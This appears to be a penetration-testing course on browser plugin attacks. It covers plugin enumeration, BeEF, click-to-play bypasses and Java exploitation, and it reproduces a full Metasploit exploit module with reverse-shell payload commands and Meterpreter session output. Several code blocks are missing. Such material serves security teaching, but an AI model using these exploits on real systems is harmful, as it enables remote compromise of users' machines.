1
Attack on Browser Plugins
Table of Contents Introduction ...... 3 What are Browser Plugins? ...... 4 Understanding Plugin Anatomy ...... 5 What you can do with a plugin ...... 6 Commonly used plugins ...... 6 What a plugins cannot do ...... 7 Some plugins that are frequently exploited ...... 7 What are browser extensions? ...... 9 The Difference Between Plugins and Extensions ...... 9 How to Call Plugins ...... 10 What is Click to Play Plugin ...... 10 In Mozilla Firefox (version 38.0.5) ...... 10 In Google Chrome ...... 11 In Internet Explorer ...... 12 In Safari browser ...... 14 How Plugins are blocked ...... 17 Plugins Enumeration ...... 17 Detecting Plugins ...... 17 In Mozilla and Chrome ...... 17 In Internet Explorer ...... 20 Automatic Plugin Detection ...... 21 Detecting Plugins Using BeEF Tool ...... 23 What is BeEF?...... 23 Plugin Detection ...... 23 Attacking Plugins ...... 25 Bypassing Click to Play Feature ...... 25 In Firefox ...... 25 Java Example ...... 29
2
Attacking Java ...... 32 Understanding Java Applets ...... 32 Detecting Java ...... 32 Bypassing the Sandbox ...... 32 Exploiting Java using Metasploit ...... 33 Attack on Flash ...... 39 Shared Objects ...... 39 Action Script ...... 40 Flash with Webcam and Microphone ...... 40 Fuzzing Flash ...... 41 ActiveX Controls ...... 42 Exploiting ActiveX Controls ...... 42 Attacking PDF Readers ...... 43 Understand JavaScript in PDFs ...... 44 Universal XSS in PDF ;) ...... 44 Launching another Browser ...... 44 Attacking on Media Plugins ...... 45 Exploiting Media Players Plugin with Metasploit ...... 46 Some Useful links ...... 48 Reference ...... 48
Introduction By reading this mini course you will able to understand what browser plugins are and how they work, what is the difference between a plugin and an extension, you will able to fingerprint what plugins are installed in a browser. We will also have a look on BeEF (Browser Exploitation Framework Project) to determine what plugins are loaded/installed, and identify those that might be vulnerable. We will look at how the Click to Play security feature implemented in Java, Firefox, and Chrome are vulnerable. In addition, how the Click to Play security feature bypasses on Java and Firefox. We will explore Java exploitation, Flash exploitation, Universal XSS in acrobat PDF, Media plugin exploitation using Metasploit, etc.
We have taken popular plugins during an endpoint security assessment in this mini course.
3
What are Browser Plugins? In computing, a plug-in (or add-in / addin, plugin, extension or add-on / addon) is a software component that adds a specific feature to an existing software application. When an application supports plug-ins, it enables customization.
The common examples are the plug-ins used in web browsers to add new features such as search- engines, virus scanners, or the ability to utilize a new file type such as a new video format. Well-known browser plug-ins includes the Adobe Flash Player, the QuickTime Player, and the Java plug-in, which can launch a user-activated Java applet on a web page to its execution on a local Java virtual machine.
Screenshot Fig 1: Mozilla Firefox displaying a list of installed plug-ins
As shown in the figure two below, the host application provides services which the plug-in can use, including a way for plug-ins to register themselves with the host application and a protocol for the exchange of data with plug-ins. Plug-ins depend on the services provided by the host application and do not usually work by themselves. Conversely, the host application operates independently of the plug-ins, making it possible for end-users to add and update plug-ins dynamically without needing to make changes to the host application
4
Screenshot Fig 2: Host application working with plug-ins
Now you can understand what plugins are. Let’s talk about web browsers such as IE, Mozilla Firefox, Opera, and Chrome etc. A browser’s primary role is rendering web pages that supports and understands HTML, JavaScript, MPEGs, Image files, etc. These plugins may require integration with other program like Flash or Java to provide or enhance user experience, rich interactive content, and additional features. These additional functionalities aren’t compulsory -- something that browser vendors want to support natively, so they usually provide a way for application developers to access these features through a plugin interface.
The plugin interface executes other programming code into the browser so that it can leverage these third-party plugin components to perform specific tasks. Due to this, some vulnerable plugins or lack of security, plugin may allow executing, remote code execution information disclosure, buffer overflow, or unexpected behaviors.
In this mini course, you learn about installed plugins such as Flash, Acrobat Reader, and Java. Once you gain knowledge about the plugins, you can use your gathered information to explore their weaknesses to potentially bypass browser safeguards. In addition, you will see attack techniques to help leverage these plugins to gain access browser to operating system.
Understanding Plugin Anatomy Now, let’s explore the definition of a plugin, as well as the difference between extensions and plugins so that you can easily understand the security impact of plugins and their severity levels. A plugin is a code that bridges between external code libraries or applications and a browser.
5
The combination of the browser API and the script API is called a plugin. The browser API controls browser interaction and external code which responsible for rendering other content types. This would allow the browser to leverage Adobe Reader’s code to display the PDF inside the browser. These plugins typically use a standard API such as ActiveX in Windows.
On the other side, the script API allows the object that is represented inside the browser to be manipulated through web APIs, mostly executed using JavaScript. The two APIs work together to allow web developers to display content, manipulate it, and present it to users in a format that is both functional and aesthetically pleasing. The Chrome browser also allows plugins to be kept in a separate process space so that if a plugin crashes, it will not crash the entire browser. You can think of the separate space as a sandbox.
What you can do with a plugin A plugin, put simply, is a third party library that “plugs in” to the browser
Plugins can be embedded in the web page using an
Commonly used plugins Macromedia Flash Microsoft Silverlight JAVA VLC media player Apple QuickTime Adobe Reader
Some plugins are used to run mime types such as Adobe Reader, which allows browsers to render the PDF files in your web browser. In addition, it effects only that page, and no others. Commonly used in
6 browsers such as Firefox, Opera, and Safari, these plugins are usually called “NPAPI plugins,” as they are written using the NPAPI (Netscape Plugin Application Programming Interface). However, In Safari, we use a Webkit Plugin. In Internet Explorer, we use an ActiveX Control.
What a plugins cannot do Plugins only understand either mime or be are embedded tags used in a web page. They don’t effect browser menus. They don’t recognize tabs, nor even have control over other pages in the same browser process. They don’t automatically process the content of every web page loaded
Some plugins that are frequently exploited Insecure browser plugins include:
1. Acrobat 2. Java 3. Flash 4. RealPlayer 5. VLC 6. QuickTime 7. Silverlight etc.
These plugins support PDFs, applets, movies, and advanced graphics for browsers and are installed along with their parent programs. You can view the installed Add-ons by going plugin Manager in Firefox and choosing the Plugins tab as shown in below screenshot
7
Screenshot Fig 3: Mozilla Firefox plug-ins
Screenshot Fig 3: Chrome browser plug-ins
8
What are browser extensions? A browser extension is a computer program that extends the functionality of a web browser in some way. Depending on the browser and the version, the term may be distinct from similar terms such as plug-in or add-on. Some extensions are authored using web technologies such as HTML, JavaScript, and CSS. Browser extensions can change the user interface of the web browser without directly effecting viewable content of a web page, for example, by adding a toolbar.
The Difference Between Plugins and Extensions Plugins and extensions are similar as both enhance the functionality of the browser. The main difference between both is that extensions add functionality using existing browser interfaces through JavaScript and other APIs, on the other hand, plugins leverage external code. An extension could contain a plugin, however, a plugin cannot contain an extension. Plugins in Firefox an .xpi extension file format. However, an extension may have an NPAPI plugin inside of it.
Extensions are functions that support a wide range of pages, as they have extended some functionality of the browser. Plugins are small programs that support file format. It calls when the browser encounters one of those file formats. This occurs when the file is embedded into a web page via the
Let’s look at an example.
GET /my%20script%20my%20ways%20ver%202.0.pdf HTTP/1.1 Host: httpsecure.org User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://httpsecure.org/?page_id=21 Cookie: _ga=GA1.2.254415231.1428700297; wp-settings- 1=editor%3Dtinymce%26libraryContent%3Dbrowse%26align%3Dcenter%26urlbutton%3Dpost%26advI mgDetails%3Dhide%26mfold%3Do%26imgsize%3Dfull%26wplink%3D1%26ed_size%3D376%26dfw_widt h%3D822; wp-settings-time-1=1428761019; viperbar_set_hide=hide; _gat=1 Connection: keep-alive
HTTP/1.1 200 OK Date: Wed, 06 May 2015 18:46:12 GMT Server: Apache/2.4.3 (Unix) OpenSSL/1.0.0-fips PHP/5.4.23 Last-Modified: Sat, 14 Mar 2015 20:59:14 GMT Etag: "16b45-51145e3b10d38-gzip" Accept-Ranges: bytes Vary: Accept-Encoding,User-Agent Content-Encoding: gzip Keep-Alive: timeout=5, max=100
9
Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: application/pdf
It knows to render it using the Adobe Acrobat plugin because Acrobat has registered itself as the handler for this MIME type.
In the response above, content-type is application/pdf. So, the browser recognizes and renders it using the Adobe Acrobat plugin because Acrobat has registered itself as the handler for this MIME type.
How to Call Plugins As mentioned above, plugins are usually called in two situations --when the Content- Type received by the web server matches a MIME type to render or handle the same, or when using
Below is a simple code to embed a Flash file into a page:
This above-mentioned code directs the browser to embed an object into the page, when the file is loaded and the content type is determined via MIME to be a Flash object. This enables the browser to determine that it should load the object with the Flash plugin and it passes the httpsecure parameter into the Flash plugin.
What is Click to Play Plugin The Click to Play feature is an important feature that attempts to help users stay safe by asking for permission before running plugins. In Mozilla Firefox (version 38.0.5) Mozilla Firefox uses click-to-play by default for most of the plug-in content. However, it will still load Flash content. There’s a plugin click_to_ play setting in Firefox’s hidden in about:config page, but its enabled by default. I guess we do not have any feature that prevents or allows us to enable click-to-play for Flash in Firefox, as I am unable to find the same.
To block or ask for permission for flash plugin we can install the Flashblock extension.
Download link: https://addons.mozilla.org/en-US/firefox/addon/flashblock/
10
In Google Chrome Google Chrome has a built-in function with the name click-to-play that works for all plug-ins, including Flash as well. You can enable the same by clicking Chrome’s menu button, then selecting the Settings option, then clicking the Show advanced settings option, then clickng Content settings under Privacy, then scrolling down to Plug-ins, and finally selecting Click to Play.
11
In Internet Explorer Internet explorer will ask for your permission before it loads plugin content, however, you need to enable it from the add-ons screen. To access it, click the tools option, then select Manage Add-ons. Then select Toolbars and Extensions, click the Show box, and select Run without permission. (As shown below)
Find the Shockwave Flash Object plug-in under Adobe Systems Incorporated, right-click it, and select More information.
12
Click the Remove all sites button, and Flash won’t load automatically on any website you visit and will ask permission for you before run.
13
In Safari browser Safari browser on Mac OS X also has an option to enable click-to-play for plug-ins. In this browser we can allow / disallow individually for each plug-in we have installed. To enable these settings, open Safari then, go to the Safari menu, and select Preferences. Then click the Security icon and click Manage Website Settings to the right of Internet plug-ins.
Select a plug-in, click the When visiting other websites box, and select Ask.
14
By using Click to Play option, attacks that involve calling older versions of Flash, Acrobat Reader, or Java plugins become more difficult to exploit as the user has to intentionally click the area on the screen where the plugin will appear to launch the code.
15
It’s not only limit the execution of old plugin versions, it also helps to reduce the likelihood of plugins executing without the user being aware. Google Chrome also has similar feature, but it has to be enabled manually as its disabled by default. However, the Click to Play feature also has hash security weaknesses that bypass the same. We will discuss those loop hole in this mini course. If Click to Play is enabled, the browser allows access to the plugin only after the user permission for which user has to click Accept button.
In the screenshot below, we explain three different types of plugins:
The Java deployment toolkit plugin enabled with Ask to activate, another plugins Java(TM) platform SE will automatically play, and plugins Google update plugin that will never activate unless the user re- enables them as its sys Never Activate.
16
How Plugins are blocked First, let’s talk about why plugin are blocked. Obviously, security is the reason. However, apart from security reasons, plugins are blocked due to the violation of corporate policy, due to streaming media, privacy concerns, or potential impacts to staff productivity.
Plugins can be blocked either by a corporate administrator configuration or by vendors itself. Microsoft, for example, has pushed out kill bits3 for certain vulnerable ActiveX plugins in the past for security patches to prevent exploitation. Some browser blocked old or vulnerable plugin itself such as Mozilla blocked older Java versions to prevent exploitation.
Apple also started blocking plugins somewhere in 2013. It started blocking Java 7 to protect users from a vulnerable version. In order to block these vulnerable plugins, Apple pushed a configuration file change to its antimalware software, Xprotect, to block the Java plugin and other vulnerable plugins.
Plugins Enumeration Enumeration is always a first step while pen testing once installed plugins enumerated so; it’s easier to identify what you are dealing with. Fingerprinting plugins is similar to browser fingerprinting where your task is to send some queries to the browser to determine its response and behavior to know what’s really running. We will explorer different ways to detect and fingerprint browser plugins.
Detecting Plugins Detecting plugins is quite easy to do, as always we have two approaches: manually and automatically. Some plugins require more work than we do usually; we first go with manually approach. Then, we go with automated detection of plugin and its versions for attack purposes.
In Mozilla and Chrome Browsers like Firefox and Chrome make this task easy by surfacing the list of plugins that are installed in the navigator.plugins DOM object. You can develop a quick code to query this for yourself and output the elements in a table using the Information from the Mozilla reference:
Copy the above-mentioned code, paste into the notepad and save it as an .html file, and then load it into your browser. It outputs a table similar to below mentioned screenshot with displayed plugins and versions.
The above-mentioned screenshot includes active installed plugins that can be called directly, as well as plugins that are Click to Play.
18
You can enumerate the plugin and its version with the below mentioned code if you are just interested in the plugin name and its version.
Below is the screenshot of above-mentioned code
19
Another way this can be done using the navigator.mimeTypes DOM object in Firefox and Chrome as well. By running a query in the array returned through this object, you can check as it returns either a MimeType object or undefined.
>>> !!navigator.mimeTypes["application/x-shockwave-flash"] true
In Internet Explorer In Internet Explorer, many plugins are executed as part of ActiveX controls. The easiest way to enumerate the plugin is installed on the system is to try to instantiate the ActiveX object and determine if it returns a valid object.
To detect if Flash is enabled in IE, you can execute the following JavaScript:
var isInstalled = false; var version = null; if (window.ActiveXObject) { var control = null; try { control = new ActiveXObject('ShockwaveFlash.ShockwaveFlash'); } catch (e) { return; } if (control) { isInstalled = true;
20
version = control.GetVariable('$version').substring(4); version = version.split(','); version = parseFloat(version[0] + '.' + version[1]); } } else { // Check navigator.plugins for "Shockwave Flash" }
This is more difficult than the checks for Firefox and Chrome, but without easy access to the plugins through the DOM, this is the most effective way of identifying plugins in Internet Explorer.
Automatic Plugin Detection Now, you can detect plugins manually using JavaScript. In this section we will learn how to detect plugins using tools. One of the best plugin detection frameworks is the PluginDetect framework written by Eric Gerds.
Automated is the best option to quickly identify all plugins installed that might be worth targeting for attack. In many cases, even users are not aware of that what all plugins have been installed. Internet Explorer version 8 and later, could alert the user through popups. It’s therefore best to test the ActiveX checks before trying them in production.
Although PluginDetect is a great tool for building plugin checks, if you just want to see a list of your own plugins and check to see if they are up to date, the Mozilla application has a plugin check site. This site not only iterates your plugins, but also checks their status. The below mentioned screenshot displays the output of the Mozilla plugin check indicating that some modules need to be updated and some are up to date.
21
22
The Plugin Status page automatically detects many common plugins; however, there may be some plugins it doesn’t detect. The site gives you information about how to research those plugin versions.
Detecting Plugins Using BeEF Tool We have already discussed some of the methods pertaining to checking your plugins or building frameworks, however, let’s talk about the hacker/Pentester’s favorite tool, BeEF.
What is BeEF? The Browser Exploitation Framework (BeEF) is an open-source penetration-testing tool used to test and exploit web application and browser-based vulnerabilities. BeEF provides the penetration tester with practical client side attack vectors. It leverages web application and browser vulnerabilities to assess the security of a target and carry out further intrusions. This project is developed for lawful research and penetration testing. In practice, like many information security tools, Beef is used for both legitimate and unauthorized activities.
BeEF hooks one or more web browsers as beachheads for the launching of directed command modules. Each browser is likely to be within a different security context, and each context may provide a set of unique attack vectors.
Plugin Detection BeEF comes with plugin detection built in, so you don’t need to use any another extend it unless you want to check for new plugins that are not in a BeEF list.
As soon as a browser is hooked into BeEF, a number of test cases are performed that check plugins automatically for you. The below mentioned screenshot shows the default plugin information that BeEF will easily fingerprint when a browser is hooked. You can see checks for Flash, VLC, and more are run at initialization
23
BeEF For those who are lazy and always need automated stuff (intelligent behavior); BeEF tries to perform its additional plugin fingerprinting without doing anything that is visible to the user. For other manual BeEF plugins, some may take actions that notify the user. Below mentioned screen shows additional commands that you can run against a browser to detect other or some specific plugins as well
24
Four different stoplight colors indicate the BeEF plugin’s alert status. The green button shows that plugins will likely not alert the user to the fact that you are checking them. If the button is gray, then either don’t work or will have minimal impact. The orange plugins will typically have edge conditions that may alert a user; for instance, the red ones will likely alert the user to your activity (Not recommended). Based on these four different colors, you can approach the module and launch it against a browser and determine additional vulnerable modules that may be executed.
Attacking Plugins Enumerating plugins helps an attacker to target the vulnerable plugin and Exploiting It. Plugins are most common target of hackers, if you are a penetration tester, you should have a good knowledge of how these plugin, and attacks work. Through this, you can determine the weakness to corporate security teams or coworkers to help motivate others to patch the weaknesses or change security policies. We will talk here different ways to attack plugins. First let’s start with “Click to Play” plugin settings, and we will have a look on few plugins that are frequently attacked by hackers. You will discover how to leverage those vulnerable plugins to take over browsers or execute code on remote machines.
Bypassing Click to Play Feature If we have learned about how Click to Play features prevent you from running unauthorized plugins. The “Click to Play” feature in new browsers is a good way to alert the user of potentially suspicious activities.
In Firefox There have been bugs to bypass Click to Play in the past that have allowed plugins to be displayed automatically. This bypass in Click to Play was discovered by Ben Murphy which successfully worked against Firefox until March 2013.
25
Here is the code for proof of concept so simple and effective:
26
Screenshot display above mentioned code
Specifying pointer-events: nothing prevented the triggering of any mouse events against the black #overlay div. It very simple to trick a user into clicking the “Click here” message, which cause the execution of the Java applet as shown below.
27
Display Click to Play bypassed executing an unsigned Java applet
By dynamically modifying the CSS definitions of the overlay div—and by adding opaque: 0.4—you can see what is behind the overlay, as shown in below screenshot.
Using mentioned technique, and a degree of social engineering, the user is effectively clicking the Click to Play box. This attack is a perfect example of a Clickjacking attack, User Interface redress attack, UI redress attack, UI redressing. The best part of this attack is that the div is rendered on top of the Click to Play dialog box.
28
Being a standard browser, Mozilla Firefox always alerts the user that the plugin is outdated, as you can see red plugin logo at the top left of the address bar a small icon. A user who is not so technical geek or not paying so much attention may click the black div.
As these are critical vulnerabilities, they are now patched. Legacy browser fingerprinting can help to understand whether a target’s browser is vulnerable.
Java Example Java version 1.7 update 11, Oracle changed its Click to Play implementation such that it is displayed for every kind of applet, even unsigned ones. Which reduce the effectiveness of using Java exploits and SOP bypasses in your attacks. However, there were a few bugs left while implementation of Click to Play
29 which allowing the execution of Java applets without any user interaction. The bypass found by Esteban Guillardoy which was patched in Java version 1.7 update 13, relied on loading a serialized applet11 through a “less-known” applet attribute called object. I recommend that you to view the source code of Java’s Plugin2Manager class so you will see the Click to Play logic there. Examining the initAppletAdapter() method, Also, you can view if the code attribute is used to instantiate the applet it fires the fireAppletSSVValidation() method, have a look to get more on this.
If the code attribute is not used, Java expects you are using the object attribute, hence loading a serialized applet. In those instances, Click to Play is not executed.
To exploit this flaw, you would embed the applet with the following code:
Let’s talk about another bypass. This was discovered by Esteban, which was patched in Java version 1.7 update 21. This bypass depends on a hidden parameter to be passed to the applet during invocation through a Java Network Launching Protocol, also known as a JNLP, descriptor. Using JNLP is a convenient way of launching applets. With JNLP you can also require the applet to run on a specific version of Java. To analyzing the source code of Java’s PluginMain class, specifically the performSSVValidation() method, you may notice the code as mentioned below:
public static boolean performSSVValidation (Plugin2Manager paramPlugin2Manager) throws ExitException { boolean bool = Boolean.valueOf(paramPlugin2Manager. getParameter("__applet_ssv_validated")). booleanValue(); if (bool) return false; LaunchDesc localLaunchDesc = null; AppInfo localAppInfo = null;
The parameter is named __applet_ssv_validate, if is set to true. Which results in skipping any checks and exiting the method. You couldn’t use this parameter with a normal applet invocation because parameter names starting with _ would be excluded. So, the same implementation of the performSSVValidation() is also called when instantiating applets through JNLP descriptors, without the restrictions on the parameter name.
That’s means; you can bypass Click to Play restrictions by launching an applet through a JNLP descriptor that uses that hidden parameter.
30
The following is an example of a JNLP descriptor you would use:
A hidden parameter that is needed to bypass Click to Play is specified in the applet description as mentioned below:
The final step is serving this JNLP file from a web server and referencing it from the page where the applet execution should be triggered, with code similar to the following:
31
These exploits have been patched by Oracle; they serve as a valid reminder of the cat-and-mouse game that browser technology plays every day. New features are being deployed by browser and plugin developers, which are then exploited by attackers, which are then patched again.
Attacking Java Java facilitates everything from web conferencing to popular games. Although Java has provided a gateway to application capabilities on the web, security professionals often recommend that Java should be disabled entirely into browse; but some of the online banking sites require Java. We have two options to run Java: either through standalone Java applications or through web applets. We will talk how applets work, manipulating applets, and finally, exploiting applets remotely to compromise systems.
Understanding Java Applets A Java applet is a small application that is written in Java and delivered to users in the form of bytecode. The user launches the Java applet from a web page, and the applet is then executed within a Java Virtual Machine (JVM) in a process separate from the web browser itself. A Java applet can appear in a frame of the web page, a new application window, Sun's AppletViewer, or a stand-alone tool for testing applets. Java applets were introduced in the first version of the Java language, which was released in 1995. (Sandbox is a security mechanism for separating running programs. It is often used to execute untested code, or untrusted programs from unverified third parties, suppliers, untrusted users and untrusted websites) includes additional security constraints.
Java applets run at very fast speeds and are comparable to other compiled languages such as C++, though the latter have a slight advantage. Until 2011, Java applets had run many times faster than JavaScript. Unlike JavaScript, Java applets had access to 3D hardware acceleration, making them well- suited for non-trivial, computation-intensive visualizations. As browsers have gained support for hardware-accelerated graphics thanks to the canvas technology (or specifically WebGL in the case of 3D graphics), as well as just in time compiled JavaScript, the speed difference has become less noticeable. Since Java's bytecode is cross-platform (or platform independent), Java applets can be executed by browsers (or other clients) for many platforms, including Microsoft Windows, FreeBSD, Unix, OS X and Linux. It is also trivial to run a Java applet as an application with very little extra code so that it can be run directly from the integrated development environment (IDE).
Detecting Java Let’s have a look how to detect whether Java is running or not. The easiest way to fingerprint a browser for the presence of Java is to convince the user to run a Java applet that will execute the query and send you the result. Once an applet is running, Java can access version strings from inside the applet itself. An unsigned applet has enough permission to achieve this as well. You just need to get the user to execute an applet, catch the result, and then send the result back to you for further targeting.
Bypassing the Sandbox Java sandbox is also vulnerable with multiple vulnerabilities, which allows an attacker to bypass the sandbox and execute malicious code outside the sandbox. In order to exploit the same you need to do
32 an enumeration of the Java version to determine if there is a weakness. We have already discussed how to enumerate installed plugin and other details. Using that information you can determine if a sandbox bypass exists for that specific version of Java or not. As Java changes regularly, you can Google it for quick search on the web for the version and to uncover potential bypasses. Other aspects to consider are the previous two examples of Java code. Each of them enables you to leverage a signed applet to bridge JavaScript and a Java applet. The most effective sandbox bypasses was CVE-2013-0422, targeting Java 1.7 between update 9 and 10.
Multiple vulnerabilities in Oracle Java 7 before Update 11 allow remote attackers to execute arbitrary code by using the public getMBeanInstantiator method in the JmxMBeanServer class to obtain a reference to a private MBeanInstantiator object, then retrieving arbitrary Class references using the findClass method, and using the Reflection API with recursion in a way that bypasses a security check by the Java.lang.invoke.MethodHandles.Lookup.checkSecurityManager method due to the inability of the sun.reflect.Reflection.getCallerClass method to skip frames related to the new reflection API. Exploited in the wild in January 2013, as demonstrated by Blackhole and Nuclear Pack, and a different vulnerability than CVE-2012-4681 and CVE-2012-3174. NOTE: some parties have mapped the recursive Reflection API issue to CVE-2012-3174, but CVE-2012-3174 is for a different vulnerability whose details are not public as of 20130114. CVE-2013-0422 covers both the JMX/MBean and Reflection API issues. NOTE: it was originally reported that Java 6 was also vulnerable, but the reporter has retracted this claim, stating that Java 6 is not exploitable because the relevant code is called in a way that does not bypass security checks. NOTE: as of 20130114, a reliable third party has claimed that the findClass/MBeanInstantiator vector was not fixed in Oracle Java 7 Update 11. If there is still a vulnerable condition, then a separate CVE identifier might be created for the unfixed issue.
Exploiting Java using Metasploit In this example, we targets Java 1.7 update 17 or below, exploiting CVE- 2013-242322 which was discovered by Jeroen Frijters. We also have a Metasploit’s module for this exploit is called Java_jre17_driver_manager.
Let’s have a look on Metasploit module:
msf > use exploit/multi/browser/Java_jre17_driver_manager msf exploit(Java_jre17_driver_manager) > set PAYLOAD Java/meterpreter/reverse_tcp msf exploit(Java_jre17_driver_manager) > set SRVHOST 192.168.1.1 msf exploit(Java_jre17_driver_manager) > set LHOST 192.168.1.1 msf exploit(Java_jre17_driver_manager) > exploit [*] Exploit running as background job. [*] Started reverse handler on 192.168.1.1:4444 [*] Using URL: http:// 192.168.1.1:8080/uGDMZKaKGvbP59 [*] Server started.
33
Now the reverse handler is all set with accept connections, Also, web server serving the malicious JAR and JNLP files, you can proceed with tricking the victim into visiting the highlighted URL. Below is above exploit code in ruby language.
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rex' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE
#include Msf::Exploit::Remote::BrowserAutopwn #autopwn_info({ :Javascript => false })
def initialize( info = {} )
super( update_info( info, 'Name' => 'Java Applet Driver Manager Privileged toString() Remote Code Execution', 'Description' => %q{ This module abuses the Java.sql.DriverManager class where the toString() method is called over user supplied classes from a doPrivileged block. The vulnerability affects Java version 7u17 and earlier. This exploit bypasses click-to-play on Internet Explorer and throws a specially crafted JNLP file. This bypass is applicable mainly to IE, where Java Web Start can be launched automatically through the ActiveX control. Otherwise, the applet is launched without click-to-play bypass. }, 'License' => MSF_LICENSE, 'Author' => [ 'James Forshaw', # Vulnerability discovery and Analysis 'juan vazquez' # Metasploit module ], 'References' => [
34
[ 'CVE', '2013-1488' ], [ 'OSVDB', '91472' ], [ 'BID', '58504' ], [ 'URL', 'http://www.contextis.com/research/blog/Java-pwn2own/' ], [ 'URL', 'http://immunityproducts.blogspot.com/2013/04/yet-another-Java-security- warning-bypass.html' ], [ 'ZDI', '13-076' ] ], 'Platform' => %w{ Java linux osx win }, 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, 'Targets' => [ [ 'Generic (Java Payload)', { 'Platform' => ['Java'], 'Arch' => ARCH_JAVA, } ], [ 'Windows x86 (Native Payload)', { 'Platform' => 'win', 'Arch' => ARCH_X86, } ], [ 'Mac OS X x86 (Native Payload)', { 'Platform' => 'osx', 'Arch' => ARCH_X86, } ], [ 'Linux x86 (Native Payload)', { 'Platform' => 'linux', 'Arch' => ARCH_X86, } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jan 10 2013' )) end
def setup
35
path = File.join(Msf::Config.data_directory, "exploits", "cve-2013-1488", "Exploit.class") @exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } path = File.join(Msf::Config.data_directory, "exploits", "cve-2013-1488", "FakeDriver.class") @driver_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } path = File.join(Msf::Config.data_directory, "exploits", "cve-2013-1488", "FakeDriver2.class") @driver2_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } path = File.join(Msf::Config.data_directory, "exploits", "cve-2013-1488", "META-INF", "services", "Java.lang.Object") @object_services = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } path = File.join(Msf::Config.data_directory, "exploits", "cve-2013-1488", "META-INF", "services", "Java.sql.Driver") @driver_services = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
@exploit_class_name = rand_text_alpha("Exploit".length) @exploit_class.gsub!("Exploit", @exploit_class_name)
@jnlp_name = rand_text_alpha(8)
super end
def jnlp_file jnlp_uri = "#{get_uri}/#{@jnlp_name}.jnlp"
jnlp = %Q|
36
| return jnlp end def on_request_uri(cli, request) print_status("handling request for #{request.uri}")
case request.uri when /\.jnlp$/i send_response(cli, jnlp_file, { 'Content-Type' => "application/x-Java-jnlp-file" }) when /\.jar$/i jar = payload.encoded_jar jar.add_file("#{@exploit_class_name}.class", @exploit_class) jar.add_file("FakeDriver.class", @driver_class) jar.add_file("FakeDriver2.class", @driver2_class) jar.add_file("META-INF/services/Java.lang.Object", @object_services) jar.add_file("META-INF/services/Java.sql.Driver", @driver_services) metasploit_str = rand_text_alpha("metasploit".length) payload_str = rand_text_alpha("payload".length) jar.entries.each { |entry| entry.name.gsub!("metasploit", metasploit_str) entry.name.gsub!("Payload", payload_str) entry.data = entry.data.gsub("metasploit", metasploit_str) entry.data = entry.data.gsub("Payload", payload_str) } jar.build_manifest
send_response(cli, jar, { 'Content-Type' => "application/octet-stream" }) when /\/$/ payload = regenerate_payload(cli) if not payload print_error("Failed to generate the payload.") send_not_found(cli) return end send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' }) else send_redirect(cli, get_resource() + '/', '') end end def generate_html jnlp_uri = "#{get_uri}/#{@jnlp_name}.jnlp"
37
# When the browser is IE, the ActvX is used in order to load the malicious JNLP, allowing click2play bypass # Else an
When the browser is redirected to the Metasploit web server URL, the JNLP file is served, as well as the malicious JAR. Metasploit will do the rest of the hard work for you, which includes transmitting and executing the Java Meterpreter stage, and finally executing the full Meterpreter payload on the target machine:
msf exploit(Java_jre17_driver_manager) > [*] 192.168.1.1 Java_jre17_driver_manager - handling request for /uGDMZKaKGvbP59 [*] 192.168.1.1 Java_jre17_driver_manager - handling request for /uGDMZKaKGvbP59/ [*] 192.168.1.1 Java_jre17_driver_manager - handling request for /uGDMZKaKGvbP59 [*] 192.168.1.1 Java_jre17_driver_manager - handling request for /uGDMZKaKGvbP59/ [*] 192.168.1.1 Java_jre17_driver_manager - handling request for /uGDMZKaKGvbP59/CanPVnBL.jnlp [*] 192.168.1.1 Java_jre17_driver_manager - handling request for /uGDMZKaKGvbP59/maUmMQvf.jar [*] Sending stage (30355 bytes) to 192.168.1.1
38
[*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.1:64944) at 2013-09-30 13:08:54 +0100
This is combination of Click to Play bypass as discussed previously, which means the attack executes without requiring user intervention.
Attack on Flash Similar to Java, Flash Player is a plugin that allows browsers such as Firefox to display Flash media on web pages. Flash is often used for animations, videos, and games. Always remember that Flash maintains its own cookie store that allows for cookies (which can’t be deleted directly from the browser). Flash can also have its own local storage to cache files, and can access the webcam and the microphone in your laptop or desktop or any other device. In addition, Flash has the capability to send and receive data to remote targets as well. Before targeting Flash, it is very important to enumerate Flash, version etc., which may help you to plan your attack. Flash plugin and the ability to use it to abuse microphones and webcams make it a valuable target. As mentioned earlier, Flash is heavily used in interactive online games. Popular Facebook games like Farmville depend on Flash. In addition, many other online games have embraced Flash.
Note: Apple not having Flash support for the iPhone. This change is causing developers to leverage other ways to build interactive applications and games supported by multiple platforms.
Shared Objects Shared Objects are the ActionScript construct that allows for local and remote retrieval of data from a data store. Shared Objects is use for Flash cookies. The user is not responsible for managing Shared Objects. As browser session cookies, Shared Objects data are not deleted on a regular basis, which is why Flash cookies are so interesting. You can get basic user information and these data stores may have information about credentials for accessing remote applications or other sensitive data.
Shared Objects information is also stored on the local file system. To view, go to:
Windows Goto C:\Documents and Settings\[username]\ApplicationData\Macromedia\Flash Player.
Mac, go to Library/Preferences/Macromedia/Flash Player/#SharedObjects/ folder in your home directory.
When reviewing these files, you might find authentication data and other sensitive information that may lead to privilege escalation. This is best way to check files that aid further exploitation.
39
Action Script ActionScript is an object-oriented programming language originally developed by Macromedia Inc. (now dissolved into Adobe Systems). It is a derivation of HyperTalk, the scripting language for HyperCard. It is now a dialect of ECMAScript (meaning it is a superset of the syntax and semantics of the language more widely known as JavaScript), though it originally arose as a sibling, both being influenced by HyperTalk. ActionScript is used primarily for the development of websites and software targeting the Adobe Flash Player platform, used on Web pages in the form of embedded SWF files.
